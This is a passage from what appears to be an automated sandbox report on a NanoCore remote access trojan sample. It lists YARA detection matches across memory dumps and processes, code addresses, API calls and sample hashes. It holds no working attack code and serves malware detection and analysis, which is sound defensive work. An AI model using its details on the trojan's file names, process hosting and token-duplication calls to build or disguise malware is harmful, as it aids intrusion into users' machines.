        Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001F.00000002.440127421.0000000003E89000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000001F.00000002.440034174.0000000002E81000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB626D0_2_00CB626D
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA83C00_2_00CA83C0
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA30FC0_2_00CA30FC
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CCC0B00_2_00CCC0B0
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CC01130_2_00CC0113
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBF3CA0_2_00CBF3CA
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB33D30_2_00CB33D3
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CAF5C50_2_00CAF5C5
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CC05480_2_00CC0548
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CCC55E0_2_00CCC55E
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CAE5100_2_00CAE510
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA26920_2_00CA2692
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB66A20_2_00CB66A2
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB364E0_2_00CB364E
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CD06540_2_00CD0654
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBF8C60_2_00CBF8C6
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB589E0_2_00CB589E
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB397F0_2_00CB397F
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CAE9730_2_00CAE973
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CADADD0_2_00CADADD
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CABAD10_2_00CABAD1
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CB6CDB0_2_00CB6CDB
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CBFCDE0_2_00CBFCDE
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CC3CBA0_2_00CC3CBA
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA5D7E0_2_00CA5D7E
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CC3EE90_2_00CC3EE9
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CA3EAD0_2_00CA3EAD
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeCode function: 0_2_00CADF120_2_00CADF12
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_003F35F04_2_003F35F0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_003F98F04_2_003F98F0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0040A1374_2_0040A137
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0041427D4_2_0041427D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043655F4_2_0043655F
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_003FF7304_2_003FF730
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004037214_2_00403721
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0040C8CE4_2_0040C8CE
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0041088F4_2_0041088F
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_004019034_2_00401903
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00413BA14_2_00413BA1
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00432D2D4_2_00432D2D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00410DE04_2_00410DE0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_0043CE8D4_2_0043CE8D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00434EB74_2_00434EB7
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00411F2C4_2_00411F2C
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 6_2_0553E4716_2_0553E471
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 6_2_0553E4806_2_0553E480
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 6_2_0553BBD46_2_0553BBD4
        Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 6_2_068203F06_2_068203F0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0040213613_2_00402136
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0040A13713_2_0040A137
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0041427D13_2_0041427D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043F3A613_2_0043F3A6
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043655F13_2_0043655F
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0040250813_2_00402508
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_003F35F013_2_003F35F0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_003F98F013_2_003F98F0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_003FF73013_2_003FF730
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0040372113_2_00403721
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0040C8CE13_2_0040C8CE
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_004028F013_2_004028F0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0041088F13_2_0041088F
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_003F98F013_2_003F98F0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0040190313_2_00401903
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0046EA2B13_2_0046EA2B
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043EAD513_2_0043EAD5
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00413BA113_2_00413BA1
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00432D2D13_2_00432D2D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00410DE013_2_00410DE0
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00401D9813_2_00401D98
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0043CE8D13_2_0043CE8D
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00434EB713_2_00434EB7
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_00411F2C13_2_00411F2C
        Source: C:\Users\user\31956653\xmjk.pifCode function: 4_2_00436219 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,4_2_00436219
        Source: xmjk.pif.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
        Source: C:\Users\user\Desktop\dAkJsQr7A9.exeSection loaded: dxgidebug.dllJump to behavior
        Source: dAkJsQr7A9.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 20.3.xmjk.pif.4d3c088.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 25.2.RegSvcs.exe.34d9650.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.34d9650.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 6.2.RegSvcs.exe.60b0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 25.2.RegSvcs.exe.44cb041.5.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 6.2.RegSvcs.exe.3f3b041.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
